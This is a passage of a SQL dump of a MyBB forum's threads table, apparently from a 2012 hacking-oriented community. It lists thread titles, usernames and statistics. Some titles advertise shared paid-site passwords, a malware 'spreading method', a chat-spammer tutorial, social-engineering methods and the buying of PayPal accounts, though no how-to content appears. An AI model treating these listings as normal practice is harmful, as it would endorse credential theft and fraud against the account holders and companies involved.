`visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('838', '54', 'realitykings premium acount for 13/10/2012', '0', '0', '0', '255', 'sbhshroy2', '1350102320', '4388', '1350102320', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('839', '54', '[13.OKT]Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '0', '0', '255', 'sbhshroy2', '1350102366', '4389', '1350461682', 'R?????zo?', '62', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('840', '4', 'Its andrew', '0', '0', '0', '256', 'Andrew', '1350102912', '4390', '1350170422', 'GlowingCapes', '253', '32', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('841', '71', 'whats the best game ever made.', '0', '0', '0', '257', 'XxTREYZxX', '1350112172', '4392', '1350206491', 'XxTREYZxX', '257', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1003', '54', '[20 Oct ] Premium Elite XXX Passes, All Checked And Working!!!', '0', '0', '0', '255', 'sbhshroy2', '1350708264', '5668', '1350708264', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('849', '73', 'when did you buy your ipod', '0', '0', '0', '257', 'XxTREYZxX', '1350126710', '4468', '1350252145', 'iTzIpod', '82', '30', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('842', '71', 'Assasins creed 3', '0', '0', '0', '254', 'Greed', '1350113037', '4400', '1350125367', 'XxTREYZxX', '257', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('843', '73', 'whats the best IOS game ever', '0', '0', '0', '257', 'XxTREYZxX', '1350113351', '4404', '1350113351', 'XxTREYZxX', '257', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('847', '76', 'add me on ps3', '0', '0', '0', '257', 'XxTREYZxX', '1350116850', '4425', '1350157635', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('844', '73', 'TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '8', '0', '257', 'XxTREYZxX', '1350115462', '4418', '1351558075', 'iTzIpod', '82', '23', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('845', '72', 'whats better ps3 or xbox', '0', '0', '0', '257', 'XxTREYZxX', '1350115753', '4419', '1350183610', 'XxTREYZxX', '257', '90', '24', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('846', '74', 'another great pvp', '0', '0', '0', '257', 'XxTREYZxX', '1350116135', '4420', '1350163700', 'XxTREYZxX', '257', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('852', '71', 'Whats the best game you played?', '0', '0', '0', '254', 'Greed', '1350148668', '4487', '1350153816', 't3h jok3r', '1', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('857', '73', 'another great app on the Ipod', '0', '0', '0', '257', 'XxTREYZxX', '1350199816', '4581', '1350199816', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('848', '12', 'can someone teach me how to hack a wifi connection', '0', '11', '0', '257', 'XxTREYZxX', '1350120079', '4435', '1350135816', 'sirchamp', '53', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('851', '9', 'Selling youtube views', '0', '0', '0', '53', 'sirchamp', '1350142176', '4483', '1350156940', 'NXK', '61', '26', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('850', '63', 'anyone interested in making me a logo', '0', '0', '0', '257', 'XxTREYZxX', '1350132531', '4478', '1350264760', 'XxTREYZxX', '257', '43', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('853', '59', 'My Way Of Spreading Method And Get Tons Of Installs', '0', '0', '0', '62', 'R?????zo?', '1350152433', '4502', '1350755241', 'R?????zo?', '62', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('854', '7', 'Boasting thread', '0', '0', '0', '53', 'sirchamp', '1350155819', '4510', '1350207006', 'sirchamp', '53', '27', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('856', '42', 'Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '0', '0', '61', 'NXK', '1350174607', '4566', '1350245117', 'Greed', '254', '29', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('855', '74', 'need a minecraft account (premium)', '0', '0', '0', '257', 'XxTREYZxX', '1350165520', '4547', '1350352739', 'iTzIpod', '82', '40', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('858', '73', 'A new series', '0', '8', '0', '257', 'XxTREYZxX', '1350200278', '4582', '1350200278', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('859', '7', 'Absence for 4 days', '0', '0', '0', '53', 'sirchamp', '1350201920', '4592', '1350232579', 'NXK', '61', '15', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('860', '52', '[tut] Creating a chat spammer', '0', '0', '0', '8', 'spacefish36', '1350202099', '4593', '1350202099', 'spacefish36', '8', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('861', '7', 'L33T Hacking Milestones', '0', '0', '0', '1', 't3h jok3r', '1350203089', '4598', '1352604446', 'iTzIpod', '82', '204', '55', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('862', '71', 'Mount and Blade 2 BannerLord', '0', '0', '0', '254', 'Greed', '1350218785', '4610', '1350252970', 'Greed', '254', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('863', '28', 'Hello other Elite people out there', '0', '0', '0', '254', 'Greed', '1350219712', '4611', '1350219712', 'Greed', '254', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('865', '73', 'that great app series 1', '0', '0', '0', '257', 'XxTREYZxX', '1350261994', '4687', '1350261994', 'XxTREYZxX', '257', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('864', '79', 'Need some coder to check this code', '0', '0', '0', '1', 't3h jok3r', '1350233613', '4640', '1351506225', 'HoverCatz', '67', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('866', '7', 'Anyone trade paypal for a DC?', '0', '0', '0', '222', 'Exposé', '1350262958', '4692', '1350262958', 'Exposé', '222', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('867', '71', 'Fifa 13', '0', '0', '0', '257', 'XxTREYZxX', '1350266621', '4709', '1350301150', 'iTzIpod', '82', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('868', '71', 'whats the best COD', '0', '0', '0', '257', 'XxTREYZxX', '1350266862', '4710', '1351480335', 'iTzIpod', '82', '19', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('869', '74', 'who loves counter strike', '0', '0', '0', '257', 'XxTREYZxX', '1350267665', '4712', '1350418780', 'XxTREYZxX', '257', '18', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1001', '7', 'Shady URL', '0', '0', '0', '205', 'mothered', '1350707012', '5660', '1350821267', 'mothered', '205', '38', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('870', '74', 'Great minecraft pvp <JOIN> -150 slots', '0', '0', '0', '257', 'XxTREYZxX', '1350267872', '4713', '1350267872', 'XxTREYZxX', '257', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('871', '65', 'What\'s Your Top 3 Movies?', '0', '0', '0', '205', 'mothered', '1350268067', '4715', '1350346828', 'VirtualLegend', '228', '12', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('872', '24', 'Windows Updates, who uses It?', '0', '0', '0', '205', 'mothered', '1350268175', '4717', '1350620861', 'mothered', '205', '26', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('873', '7', 'What do you think of Facebook?', '0', '0', '0', '205', 'mothered', '1350268348', '4718', '1350613030', 't3h jok3r', '1', '25', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('874', '7', 'N.A.S.A HACKED', '0', '0', '0', '257', 'XxTREYZxX', '1350268816', '4722', '1350995425', 'dccfoux', '285', '56', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('875', '3', 'New LH Avatars', '0', '0', '0', '1', 't3h jok3r', '1350275816', '4739', '1350339753', '??????????¢™', '3', '93', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('876', '7', 'Anyone have a paypal + ebay I can buy off you?', '0', '0', '0', '222', 'Exposé', '1350276079', '4742', '1350328816', 'iTzIpod', '82', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('877', '11', 'could some one teach how to hack facebook tetrisfreinds', '0', '0', '0', '257', 'XxTREYZxX', '1350278405', '4747', '1351549369', 'anonymous_sam', '304', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('878', '16', 'ƒ???????????g\'s Dell SE Method....', '0', '0', '0', '222', 'Exposé', '1350283397', '4748', '1350707295', 'Exposé', '222', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('879', '9', 'could some one teach how to make money on a site.', '0', '0', '0', '257', 'XxTREYZxX', '1350290641', '4750', '1350315834', '??zg???g????61', '100', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('880', '9', '[eBook] How to make a fortune by playing Fifa ($65 eBook) [ONLY $3!]', '0', '0', '0', '100', '??zg???g????61', '1350316371', '4765', '1350348858', '??zg???g????61', '100', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('881', '35', 'Which Signature Is Better ? | Rate My Graphics !!!', '0', '17', '0', '228', 'VirtualLegend', '1350322703', '4775', '1350377402', 'XxTREYZxX', '257', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('883', '7', 'Congratz virtual', '0', '0', '0', '4', 'Triple H', '1350329533', '4784', '1350387037', 'mothered', '205', '40', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('882', '9', '[ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '0', '0', '228', 'VirtualLegend', '1350327955', '4777', '1350389494', 'VirtualLegend', '228', '27', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('884', '2', 'Testing new Mycodes', '0', '0', '0', '1', 't3h jok3r', '1350338202', '4795', '1350424473', 't3h jok3r', '1', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('885', '71', 'Who Has Already Pre-Ordered Black Ops 2 ?', '0', '0', '0', '228', 'VirtualLegend', '1350348181', '4812', '1350374106', 'R?????zo?', '62', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('886', '35', 'My logo', '0', '0', '0', '257', 'XxTREYZxX', '1350352852', '4820', '1350418044', 'XxTREYZxX', '257', '21', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('887', '3', 'How did virtual become Mod? Explanation here', '0', '0', '0', '1', 't3h jok3r', '1350353469', '4823', '1350442280', 'Exposé', '222', '85', '14', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('888', '7', 'Greed is a scammer', '0', '0', '0', '82', 'iTzIpod', '1350357160', '4832', '1350427159', '??????????¢™', '3', '98', '19', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('889', '3', 'Vote for a new theme', '0', '0', '4', '1', 't3h jok3r', '1350361900', '4842', '1350774985', 'NXK', '61', '94', '18', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('891', '35', 'My New Signature !!! | Rate My Signature', '0', '17', '0', '228', 'VirtualLegend', '1350393266', '4878', '1350399268', 'D?ea', '264', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('890', '71', 'Boreder lands 2', '0', '0', '0', '257', 'XxTREYZxX', '1350379627', '4860', '1350379627', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` 